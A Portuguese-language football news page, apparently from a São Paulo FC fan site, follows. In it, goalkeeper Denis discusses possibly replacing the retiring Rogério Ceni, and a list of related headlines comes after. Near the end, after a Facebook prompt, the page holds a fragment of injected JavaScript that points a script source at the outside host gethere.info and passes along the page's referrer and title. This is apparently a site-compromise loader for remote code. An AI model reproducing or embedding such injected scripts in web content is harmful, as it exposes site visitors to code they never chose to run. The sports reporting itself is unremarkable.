Destaque Principal

Denis projeta Tricolor sem Rogério: ‘Espero que a torcida compreenda’


O ciclo de Rogério Ceni como atleta do São Paulo está perto de se encerrar após 23 anos. Ainda não há uma certeza, mas o camisa 1 já deu pistas de que pode se aposentar no fim da atual temporada. Hoje reserva imediato, Denis é um dos nomes para assumir a meta quando Ceni parar de jogar. Quando o capitão tricolor assinou o primeiro contrato com o clube do Morumbi, em 7 de setembro de 1990, Denis tinha apenas três anos.

Titular contra o Cruzeiro, no Mineirão, nesta quarta-feira, às 21h50, o goleiro vive a expectativa de ganhar a titularidade definitiva em breve. No entanto, declara que o objetivo, no momento, é coletivo.

– Estou há quase cinco anos me preparando para as oportunidade. A expectativa para ano que vem é muito grande, mas não consigo pensar em janeiro se tenho que enfrentar o líder do campeonato no próximo jogo – comentou, sobre a partida contra o time mineiro.

Diante da má fase do Tricolor, que é o 16º colocado, com apenas 30 pontos em 26 jogos, no limite para não entrar na zona de rebaixamento, Denis vê o confronto contra o líder como uma grande oportunidade para conquistar a confiança da comissão técnica e do torcedor.

– A cobrança vai ser muito grande em cima de qualquer goleiro que jogar aqui. O goleiro que entrar no lugar do Rogério, quando aposentar, vai ter dificuldade, cobrança. A torcida vai ter que entender que o Rogério parou e é o Denis que está no gol. Aprendi muito com o Rogério, isso vai ser importante para mim, que tenho mais uns 15 anos de carreira. Espero que a torcida compreenda que o Rogério não vai estar dentro de campo e será o Denis.

Denis trabalha, mas sem a certeza de ter a vaga de Rogério Ceni desocupada já em 2014, já que a aposentadoria do capitão tricolor é mistério inclusive para os companheiros de equipe, restando 12 rodadas para o fim do campeonato e até sete jogos a mais pela Sul-Americana, dependendo de quão longe o São Paulo for na competição continental.

– Não falou para mim, para ninguém e nem vai falar, pelo que conheço. Para mim não seria surpresa se ele ficar pelo que ele já fez, como ele se cuida. É um exemplo de profissional. Se ele vai parar ou não apenas o próprio Rogério sabe. Não vejo problema se ele renovar o contrato por mais um ano, desde que renovem o meu por mais dez. Se contratarem mais um goleiro, então, vou brigar pelo meu espaço – disse Denis, que tem contrato até dezembro de 2016.

Fonte:Ge

Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Destaque Principal

Mais em Destaque Principal

Doriva cede, coloca Rodrigo Caio como zagueiro e retoma dupla de Osorio

saopauloadmin2 de novembro de 2015

Terra do M1TO

saopauloadmin20 de novembro de 2014

Com vantagem no Choque-Rei, Tricolor defende bons números

saopauloadmin2 de fevereiro de 2014

Lateral do São Paulo faz exames médicos para fechar com Ponte Preta

saopauloadmin30 de janeiro de 2014

São Paulo confirma desistência de construtora e culpa oposição

saopauloadmin28 de janeiro de 2014

Conversa e ajustes antes do Rio Claro

saopauloadmin28 de janeiro de 2014

Lúcio relata bronca e premeditação de Autuori para dispensá-lo

saopauloadmin27 de janeiro de 2014

Jornalista critica meio-campo do São Paulo e dá crédito a Luis Fabiano

saopauloadmin26 de janeiro de 2014

Tricolor aposta nos laterais para bater o Oeste

saopauloadmin26 de janeiro de 2014